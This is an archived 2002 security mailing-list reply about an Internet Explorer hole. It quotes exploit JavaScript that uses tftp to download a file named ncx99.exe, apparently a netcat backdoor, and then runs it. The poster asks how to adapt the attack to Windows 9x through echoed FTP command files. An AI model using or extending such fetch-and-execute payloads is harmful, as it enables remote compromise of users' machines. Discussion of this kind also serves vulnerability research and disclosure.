Re: Rather large MSIE-hole

From: Felipe Franciosi (franciozzyat_private)
Date: Thu Mar 14 2002 - 03:41:01 PST

  • Next message: Jose Nazario: "RE: Ph.D Network/Internet/Web/App security"

    > var programName=new Array(
    >      'c:/winnt/system32/tftp.exe -i GET ncx99.exe',
    >      'c:/winnt/system32/ncx99.exe',
    >  );
    MS Windows 9x don't have trivial ftp client by default... I was
    thinking how this could be exploitable on these versions...
    The FTP client offers the option to read a text-file containing
    line separated commands.
    But I couldn't get to work something like:
    var prog...
          'c:/ /c echo bin > c:/list.txt',
          'c:/ /c echo GET something >> c:/list.txt'
    this won't create 'list.txt'... Any ideas why? Or how some could
    get around it?
     Felipe Franciosi        paradoxo networking
     felipe at paradoxo dot org   Porto Alegre - RS
     Fone: (55)(51)9123-0557      UIN - 33596050

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